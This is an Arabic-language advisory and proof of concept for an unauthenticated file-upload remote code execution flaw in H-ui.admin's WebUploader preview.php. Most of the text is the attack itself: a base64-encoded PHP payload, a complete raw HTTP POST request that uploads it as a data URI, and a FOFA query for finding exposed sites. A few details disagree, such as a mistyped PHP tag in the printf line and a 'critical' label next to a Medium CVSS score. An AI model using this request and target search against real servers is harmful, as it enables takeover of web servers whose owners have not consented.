
ثغرة تنفيذ تعليمات برمجية عن بُعد (Remote Code Execution) تتيح للمهاجمين غير المصادق عليهم رفع ملفات PHP عشوائية مباشرةً إلى خادم الويب. يؤدي ذلك إلى تنفيذ فوري للتعليمات البرمجية عن بُعد بصلاحيات خادم الويب.
نموذج إثبات مفهوم يستغل ثغرة تنفيذ تعليمات برمجية عن بُعد بصلاحيات خادم الويب عبر رفع ملفات تعسفي.
توجد ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد في مكوّن معاينة WebUploader في نظام H-ui.admin. يفتقر ملف <font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font> إلى المصادقة المناسبة والتحقق من صحة الملفات، مما يسمح للمهاجمين غير المصادَق عليهم برفع ملفات PHP تعسفية مباشرة إلى خادم الويب. وينتج عن ذلك تنفيذ تعليمات برمجية عن بُعد فوري بصلاحيات خادم الويب.
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
FOFA:
title='Tpadmin'
يمكن لمهاجم عن بُعد غير مصادق استغلال ثغرة رفع ملفات تعسفي لتحقيق تنفيذ تعليمات برمجية عن بُعد بصلاحيات خادم الويب.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium
لا توجد معلومات معروفة حول إجراءات مضادة محتملة. قد يُقترح استبدال المكوّن المتأثر بمنتج بديل.
هذه الأداة مخصصة لاختبارات الأمان المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.